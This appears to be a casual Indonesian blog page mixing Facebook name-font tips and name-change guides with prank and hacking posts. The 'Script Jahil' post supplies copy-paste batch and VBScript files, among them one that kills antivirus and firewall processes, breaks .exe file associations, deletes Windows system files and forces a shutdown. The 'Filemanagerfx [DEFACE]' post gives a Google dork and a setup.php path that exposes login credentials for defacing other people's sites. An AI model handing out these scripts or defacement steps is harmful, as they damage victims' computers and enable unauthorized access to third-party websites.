Flip Text  Generator

Flip Text Generator

Mau update status terbalik??
Coba aja masukin kata di bawah ini,, klau udah tinggal copy paste :p

Penasaran??
coba aja sndiri







Text Generator

Masukkan tulisan kamu di bawah ini






Di bawah ini hasilnya







Font Facebook Part III

Font Facebook Part III

Ini sambungan dari post yang sebelumnya Font Facebook Part II


ぃ あ ぁ ぃ ぅ う ぇ え ぉ お か が き ぎ け げ こ ご さ さ ざ し じ す ず せ ぜ そ ぞ た

だ ち っ ぢ ゑ ゐ わ ゎ ろ れ る り ら よ ょ ゆ ゅ ゃ も め む み ま ぽ ほ ぼ

ぷ ぶ ふ ぴ び ひ ぱ ば は の ね ぬ に な ど と で て を ん

ゔ ゕ ゖ ゝ ゞ ゟ ァ ア ィ イ ゥ ウ ェ エ ォ

オ カ キ ガ ヌ ニ ぃ ニ ナ ド ド ト

テ ヅ ヂ チ ロ レ ル リ ラ ヨ

ョ ユ ュ ヤ ャ モ

メ ム ミ マ

ポ ボ ホ


Contoh :
ニニニロニニニ
チエマわムひて
----------------------------------------------------------------
அ ஆ இ ஈ உ ஊ எ ஏ ஐ ஒ ஓ ஔ க ங ச ஜ

ஞ ட ண த ந ன ப ம ய ர ற ல ள ழ வ ஷ ஸ

ஹை ௧ ௨ ௩ ௪ ௫ ௬ ௭ ௮ ௯ ௰ ௱ ௲

Contoh :
உஉஉஉஉஉ
ஒஒஒஒஒஒஒஒ
----------------------------------------------------------------


अ आ इ ई उ ऊ ऋ ऌ ऍ ऎ ए ऐ ऑ ऒ ओ औ क ख ग घ ङ च छ ज झ ञ ट ठ ड ढ ण त थ द ध न ऩ प फ ब भ म य र ऱ ल ळ ऴ व श ष स ह ॐ क़ ख़ ग़ ज़ ड़ ढ़ फ़ य़ ॠ ॡ

Contoh :
ऋऋऋऋऋऋऋऋ
ठठठठठठठ
----------------------------------------------------------------
ހށނރބޅކއވމފދތލގޏސޑޒޓޔޕޖޗޘޙޚޛޜޝޞޟޠޡޢޣޤޥ

Contoh :
ޒޒޒޒޒޒޒޒޒޒ
ޜޜޜޜޜ
----------------------------------------------------------------
ﬗ ﬖ ﬕ ﬔ ﬓ ჵ ჴ ჳ ჱ ჰ წ ძ ც ჩ შ ყ ღ ქ ფ ტ უ ს რ ჟ პ ო ნ ო მ ლ დ լ ի ժ թ ը է զ ե դ գ բ ա

Contoh :
ქქქქქ
աաաա
----------------------------------------------------------------
અ આ ઇ ઈ ઉ ઊ ઋ ઍ એ ઐ ઑ ઓ ઔ ક ખ ગ ઘ ઙ ચ છ જ ઝ ઞ ટ ઠ ડ ઢ ણ ત થ દ ધ ન પ ફ બ ભ મ ય ર લ ળ વ શ ષ સ હ ૧ ૨ ૩ ૪ ૫ ૬ ૭ ૮ ૯

Contoh :
ઔઔઔઔઔઑ
૬૭શ

Gunakan kreasi anda masing masing


Font Facebook Part II

Font Facebook Part II

Ini sambungan dari post yang sebelumnya Font Facebook


Aku sih gak tau apa nama font ini :p tapi font ini ada di Charmap dengan nama "Estrangelo Edessa"


Ini dia Fontnya
ܒ  ܐ ܓ ܔ ܕ ܖ ܗ ܘ ܙ ܚ ܛ ܜ ܝ ܞ ܟ
ܡ ܬ ܫ ܪ ܩ ܨܧ ܦ ܥ ܤ ܣ ܢ ܡ ܠ
ܱ ܲ ܳ ܴ ܵ ܶ ܷ ܸ ܹ ܺ ܻ ܼ ܿ ݀ ݁ ݂ ݃ ݄ ݅ ݆ ݇ ݈


Contoh yang udah jadi

ܓܐܢܦܧܙܓܐ

ܙܲܙܲ


 ܦܧܦܧܦܧ


Ada juga font font yang kecil
ε ζ ζ η θ ι κ λ μ ν ξ ο ρ ς 
σ τ υ φ χ ψ ω ϊ ϋ ό ύ ώ


Untuk cara ganti nama kesini Ganti Nama (Update)


Silakan di coba sendiri :D
Klau berkenan silakan tinggalkan komentar di bawah
klau gak punya ID blog gunakan pilihan "Name/Url"

Font Unik Facebook

Font Unik Facebook

Bosan ya sama karakter Facebook yang gitu gitu aja??
kasihaaan deh loo :p

nih aku kasih font yang masih bisa buat nama facebook
Cekidot
а в с е г к м н ь ѕ і ј т у х о р


Bisa juga di gabungin sama karakter di bawah ini

г о е а ж й к л т м н ф в п и р с у х д 


ҝ ң ќ ћ ч щ љ ј ї і ђ я э х ш ѓ ң ҝ ң ғ җ ѕ


ы њ ю ь ъ ц ҳ


Contoh
Nama Depan : тнэ ғцсҝіи
Nama Tengah : (kosong)
Nama Belakang : мано суьег


Untuk cara ganti nama kesini Ganti Nama (Update)



Ganti Nama (Update)

Ganti Nama (Update)

Maaf ya baru post sekarang.. habisnya lagi sibuk  ̶s̶̶o̶̶k̶̶ ̶̶a̶̶r̶̶t̶̶i̶̶s̶


Aku mo buat tutor tentang ganti nama
Pertama .. ke pengaturan akun > di bagian Nama klik sunting
(klik gambar untuk memperbesar)





Kedua..
pilih  stok yang masih ada.. klo gak bisa coba aja terus ampe bisa :p trus klik "simpan perubahan"

udah?? udah teganti bluumm?
liat dulu di profil udah teganti apa blum
klo udah teganti kita ke step selanjutnya
Klik aja facebook.com/hacked
udah?? ntar muncul kya gini klik aja "Lanjutkan"

naaah di sini di suruh ganti password baru.. masukin aja passwordnya trus pencet "kirim"
Next,, klik aja lagi "Lanjutkan"
klik lanjutkan lagi
Ini nih yang paling penting,, :D langsung aja klik "Ganti"

Isi deh namanya sesuka kamu.. aku kasih contoh deeh
Nama Depan : Isi Nama
Nama Tengah : (kosong)
Nama Belakang : Di Sini

Aku kasih saran siih,, gak usah diisi nama tengahnya
Langkah trakhir nih
Klik aja "Masuk"
Selesai Deh.. Liat aja Hasilnya
Ada pertanyaan? Kirim ke sini

Script Jahil

Script Jahil

Kayanya kali ini bakal seru nih
soalnya kita ngebahas tentang Script

Tapi script jahill





Kya gimana yah caranya??


BAHAN yang di perluin :
- kopi
- kwaci
- Notepad

Cara :
- copas (copy paste)

ini nih kode kodenya
MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
==> save nama script diatas dg ekstensi *.bat


BIKIN SHUTDOWN + MESSAGES
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"
==> save nama script diatas dg ekstensi *.bat


MAININ CAPS LOCK BUTTON
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
==> save nama script diatas dg ekstensi *.vbs


BUKA TUTUP CD/DVD SECARA OTOMATIS
Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
==> save nama script diatas dg ekstensi *.vbs


BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS
Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
==> save nama script diatas dg ekstensi *.vbs


MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS
MsgBox "kembali ke menu
sebelumnya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
==> save nama script diatas dg ekstensi *.vbs


OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD
Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop
==> save nama script diatas dg ekstensi *.vbs



MEMBUKA NOTEPAD TERUS MENERUS
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
==> save nama script diatas dg ekstensi *.BAT


OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG KAMU MAU"
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
==> save nama script diatas dg ekstensi *.vbs


BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
==> nah script diatas save jadi quiz.bat


POKOKNYA KALO YG INI DICOBA DULU DEH !!
@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”
==> save script diatas dg ekstensi *.bat



*Keterangan : Untuk Kode cetak tembal dibawahnya merupakan keterangan ekstensi cara menyimpanya, misalnya ekstensi nya .vbs , jadi cara menyimpanya sebgagai berikut :
1. Buka notepad
2. Copy paste scriptnya
3. Save, dengan tipe ALL FILE dan Beri nama terserah Anda lalu di beri akhiran ekstensinya .vbs

Terima kasih buat
yang udah mau kunjungin blog cupu ini





Cara Mengunci Folder Tanpa Software Apapun Di Windows

Cara Mengunci Folder Tanpa Software Apapun Di Windows

Tips dan trik ini sudah aku coba praktekan pada windows xp dan hasilnya si folder yang dikunci dibuat menghilang dan tidak tampak pada explorer (benar benar menghilang bukan di hidden seperti pada umumnya).
Caranya seperti ini:

1. Buka notepad kemudian copy paste script / kode dibawah ini:





cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==inidiganti goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


2. Ganti kode yang di tebalkan (inidiganti) pada script diatas dengan password yang kalian inginkan.

3. Save as dengan nama bebas tapi berekstensi .bat (bukan TXT), caranya pas save as pilih all type kemudian file name diisi bebas tapi diakhiri dengan .bat Contoh : kunci.bat

4. klik 2 kali kunci.bat tersebut dan sebuah folder bernama Locker akan di buat secara otomatis.

5. Sekarang pindahkan file dan folder yang akan di kunci ke dalam folder Locker tersebut.

6. klik 2 kali kunci.bat kemudian ketik y lalu tekan enter.

7. simsalabim folder Locker pun menghilang, untuk membukanya tinggal klik 2 kali kunci.bat lalu ketikkan passwordnya (lihat langkah 2 jika kalian belum mengganti password pada scriptnya).
Share GIF to Facebook

Share GIF to Facebook










Text Javascript


Kali ini aku mau share tentang huruf warna warni
Like text below


Google Translate
Follow the steps below
source by Rex Azhar

Membuat Page Di Blog

Kali ini aku pengen jelasin sedikit script buat bkin paging di blog


Nih Contohnya


Tu De Poin Aja deh boy..


Pertama.. Login ke Blog dulu (ia lah login ke blog.. masa pesbuk)




Trus ke > Rancangan > Elemen Laman > Tambah Gadget > HTML/JavaScript

Masukin deh script di bawah nih






Page Blog


Klo udah.. truh Scriptnya di bawah postingan
kaya gambar di bawah ini




semoga ̶t̶̶i̶̶d̶̶a̶̶k̶ Berhasil 
Dapetin POST ID

Dapetin POST ID















Filemanagerfx [DEFACE]

Di sini aku mo jelasin Tutor Deface sederhana
Dork : inurl:"/filemanagerfx/"

Cara penggunaanya?
cari target dulu ya d google.
nh klo ketemu ?? biasanya msh berbentuk

http://[localhost]//filemanagerfx/main.html <<< itu kita d sruh login :( nh untuk mencari user loginnya ckup kita tmbhkn php/setup.php dgn cara menghapus main.html. jd sperti ini. http://[localhost]/filemanagerfx/php/setup.php <<< :D nah nnti kliatan tu user sama pass ny :D hhehe



Okay di postingan ku kali ini aku udah upload html ku
http://www.slatterysalesproducts.com/files/index.html/
nih screenshootnya 


mudah kan?
Selamat Mencoba




























Javascript iseng buat Pesbuk

Javascript iseng buat Pesbuk




Di sini aku mo bagi2 javascript iseng yang bisa di pake Buat Pesbuk 

To The Point aja deh..
copy script di bawah ini (tapi pilih salah satu dari 4 skrip di bawah.. jangan semuanya)
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0) .



javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("body"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);



javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("div"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);


javascript:R=0; x1=.2; y1=.1; x2=.5; y2=.48; x3=3.2; y3=.48; x4=600; y4=400; x5=600; y5=400; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.rightt=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Copy Script di atas ke address bar
tau addres bar kan?
(tempat ketik halaman misal www.facebook.com)


Wassalam




 
 



Cara Mengetahui User ID Facebook

Cara Mengetahui User ID Facebook

Di sini aku mo jelasin gimana caranya mengetahui user id di pesbuk

cara mengetahui user id sangat gampang..

kita hanya perlu ke profile trus kita liat di address bar, maka akan terlihat user id nya

contoh

di sini kita bisa mengetahui bahwa idnya adalah 
"100000593980587"




Tapi ada juga profile orang yang pake username

Nih ku kasih contoh


di situ address bar bertuliskan

"http://www.facebook.com/firman.sanji"
looooohh.. trus id nya mana?

tnang, caranya cukup gampang,

pertama klik kanan pada foto profile lalu "copy image location"

liat gambar untuk lebih jelas
Trus paste di mana saja..

sbgai contoh, ku paste di address bar aja

liat gambar di bawah


nah , angka yang di block itulah adalah user id nya..
Terima kasih